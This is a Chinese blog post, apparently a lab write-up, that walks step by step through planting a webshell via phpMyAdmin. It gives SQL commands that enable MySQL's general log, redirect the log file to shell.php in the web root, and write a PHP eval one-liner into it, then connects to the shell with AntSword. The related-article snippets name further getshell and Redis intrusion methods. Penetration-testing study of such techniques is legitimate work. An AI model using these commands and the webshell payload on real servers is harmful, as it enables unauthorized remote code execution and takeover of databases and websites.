phpmyadmin+日志getshell

最新推荐文章于 2024-01-26 08:46:38 发布
最新推荐文章于 2024-01-26 08:46:38 发布
阅读量1.6k 收藏 2
点赞数
分类专栏: Web安全攻防 文章标签: mysql 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zlirving_/article/details/106783420
版权

通过phpmyadmin管理后台getshell思路有很多种,比如直接写入一句话、创建表再导出、慢查询日志等…

这里较详细介绍一下全局日志getshell思路
 

phpMyAdmin

phpMyAdmin 是众多MySQL图形化管理工具中使用最为广泛的一种,是一款使用PHP 开发的基于B/S模式的MySQL客户端软件,该工具是基于 Web 跨平台的管理程序,并且支持简体中文,用户可以在官网上下载最新版本的。
 

GetSHELL前提
  1. phpMyAdmin利用日志文件GetSHELL前提账号必须有可读可写权限
  2. MySQL 5.0版本以上会创建日志文件,我们通过修改日志文件的全局变量,就可以GetSHELL
  3. 满足上方两个条件,还需要知道网站的绝对路径 —> 传送门:如何爆路径
     
    这里简单用php探针来获取网站路径
    在这里插入图片描述
开始吧

查看general log是否开启
show variables like '%general%';
在这里插入图片描述
打开general_log日志读写功能
SET GLOBAL general_log='on'; SHOW VARIABLES LIKE '%general%';
在这里插入图片描述
创建日志文件
由于之前我们通过php探针得到了网站的绝对路径,然后我们就可以写入shell.php到网站的根目录下:
SET GLOBAL general_log_file='D:\\phpStudy\\PHPTutorial\\WWW\\shell.php'; (注意路径斜杆双写)
在这里插入图片描述
写入一句话到shell.php

SELECT '<?php @eval($_POST[yijuhua]);?>';
在这里插入图片描述
这里说明一点
如果eval连接不上,可采用另外代码执行函数写入
在这里插入图片描述
连上蚁剑
在这里插入图片描述
 
GOT IT!

 
******************************************************
小实验小结,具体测试利用方式需根据具体实践场景~

想冲大厂的癞蛤蟆
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpmyadmin getshell的四种方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-20 1642
phpmyadmin常见的getshell的几种方法,一共是四种:1、日志文件写 shell2、在知道绝对路径的情况下,利用INTO OUTFILE3、慢查询写入webshell4、创建数据库和表写入webshell: 1、日志文件写 shell(phpmyadmin getshell的四种方法) general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话,那么就可以成功 getshell
getshellPhpmyadmin日志
MoCoCN的博客
08-30 626
@MoCoCN Phpmyadmin日志getshell 当初接触渗透测试的时候getshell就会个文件上传,后来随着工作学到的知识越来越多,慢慢的getshell的姿势也慢慢的学到了些,这次给大家分享一个很常见也很基础的getshell的方式。如有什么不严谨的地方,还望大佬指点。 1.准备环境 一台装有Phpstudy(mysql>5.0)的服务器 中国蚁剑 2.开启phpstudy 3.访问服务器phpmyadmin页面 4.弱口令root root登录进去,点击SQL,执行sql语句 查
phpmyadmin-文件包含漏洞代码审计过程(超详细)
最新发布
qq_59020256的博客
01-26 961
phpmyadmin-文件包含漏洞。
套件php 集成最新的Apache+Nginx+LightTPD+PHP+MySQL+phpMyAdmin+Zend Optimizer+Zend Loader
03-12
简单的一键部署PHP调试环境,适合初学者。集成最新的Apache+Nginx+LightTPD+PHP+MySQL+phpMyAdmin+Zend Optimizer+Zend Loader
MySQLShell方法总结
做自己喜欢的事,并将其发挥到极致!
12-31 4553
MySQL注入点,用工具对目标站点写入一句话shell,需要哪些前提条件? **root权限以及网站的绝对路径** outfile 和 dumpfile 写Shell 利用条件 ·数据库当前用户为root权限 ·知道当前网站的绝对路径 ·PHP的GPC为OFF状态;(魔术引号,GET、POST、COOKIE) `写入的那个路径要有写入权限 过滤了单引号into outfile 还可以用吗 不能,GPC要OFF才行,可以测试Hex编码 基于UNION联合查询 ?id=1 UNION ALL SELECT
phpmyadmin Getshell 思路
Yhl_Z的博客
05-23 217
phpmyadmin Getshell 思路
phpmyadmin getshell
YouthBelief的博客
11-11 4766
phpmyadmin getshell前言一、into outfile写马条件利用方法操作二、开启日志写马getshell条件利用方法操作三、慢查询webshell利用方法操作四、创建数据库和表写入webshell条件利用方法特殊版本getshell 前言 phpMyadmin是一个以PHP为基础的MySQL数据库管理工具,使网站管理员可通过Web接口管理数据库。 虽然网上有很多公开的文章,也用过很多次了,但自己再总结一遍方便自己查阅。 一、into outfile写马 条件 1.对web目录需要有写权限能
PhpMyadmin--getshell
qq_64664156的博客
09-20 166
phpMyAdmin通过MySQL日志文件getshell
phpmyadmin getshell总结
yy
10-25 2703
phpMyAdmin 是一个用PHP编写的开源软件工具,可以通过web方式控制和操作MySQL数据库。通过phpMyAdmin 可以完全对数据库进行操作,例如建立、复制和删除数据等。
phpmyadmin页面getshell
qq_52469895的博客
04-10 2350
来到phpmyadmin页面后如何getshell呢?下面介绍两种方法 0x01 select into outfile直接写入 1、利用条件 对web目录需要有写权限能够使用单引号(root) 知道网站绝对路径(phpinfo/php探针/通过报错等) secure_file_priv没有具体值 2、查看secure_file_priv值 show global variables like '%secure%'; 关于secure_file_
phpmyadmin常见getshell的方法
Blue的博客
06-10 2418
1、利用条件2、如果满足以上条件可以直接写shell在实际写webshell的时候,我们经常会遭受到secure_file_priv的阻拦,secure_file_priv这个配置参数用来限制load data、outfile、load_file()的使用。在高版本的mysql中默认为NULL,就是不让导入和导出解决办法:在Windows下可在my.ini的[mysqld]里面,添加secure_file_priv=在linux下可在/etc/my.cnf的[mysqld]里面,添加secure_file_
Apache_PHP+MySQL+phpMyAdmin+ZendOptimizer
02-21
Apache_PHP+MySQL+phpMyAdmin+ZendOptimizer
syslog-ng+phpmyadmin+mysqlforcentos.rar
01-31
syslog-ng+phpmyadmin+mysqlforcentos.rar
syslog-ng+phpmyadmin+mysqlforcentos.pdf
11-08
syslog-ng+phpmyadmin+mysqlforcentos.pdf
Redis未授权访问之ssh免密登录(踩坑)
Zlirving_的博客
06-29 3970
关于Redis漏洞的详解及写shell、getshell的利用请出示门票:传送门 利用原理 利用 Redis 自身的提供的 config 命令,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接使用对应的私钥登录目标服务器。 利用 实验场景 Redis服务器(靶机):Ubuntu 16.4 ----- 192.168.101.46 Redis客户机(攻击机):Ubuntu 16.4 ----- 192.168.
如何获取网站绝对路径(一)
Zlirving_的博客
06-16 3759
一、通过页面报错找路径 1、存在注入时单引号爆路径 就像测试SQL注入一样在参数后面加上单引号,若页面返回内容可能爆出网站路径 http://www.test.com/xxx.php?id=100' 2、错误参数值爆路径 若第一种方式触发waf,可通过错误参数值爆网站路径 http://www.test.com/xxx.php?id=-100' http://www.test.com/xxx.php?id=AbCdE' 3、通过搜索引擎获取 通过搜索引擎语法搜索页面报错内容可能获取到网站路径 Site:te
Redis未授权访问之反弹shell
Zlirving_的博客
06-17 1880
Redis简介 Redis 是一个高性能的key-value数据库。为了保证效率,数据都是缓存在内存中。redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件,并且在此基础上实现了master-slave(主从)同步   漏洞简介 1、什么是redis未授权访问漏洞 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证,会导致任意
Drupal远程代码执行(CVE-2018-7602)与其Poc分析
Zlirving_的博客
06-24 1665
漏洞概述 这个漏洞是CVE-2018-7600的绕过利用,两个漏洞原理是一样的。攻击者可以通过不同方式利用该漏洞远程执行代码。CVE-2018-7602这个漏洞是CVE-2018-7600的另一个利用点,只是入口方式不一样。所以,一旦参数可控并且没有经过正确的过滤,就很有可能出问题。   漏洞影响 ①对URL中的#进行编码两次,绕过sanitize()函数过滤 ②任意命令执行 ③… 影响版本 Drupal 7.x,8.x 修复版本 Drupal 7.59,Drupal 8.5.3,Drupal 8
PHP+phpmyadmin增删改查
12-08
以下是PHP+phpmyadmin增删改查的示例代码: 1. 连接数据库 ```php $link = mysqli_connect('localhost', 'username', 'password', 'dbname', 'port', 'socket'); if (!$link) { die('连接失败: ' . mysqli_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值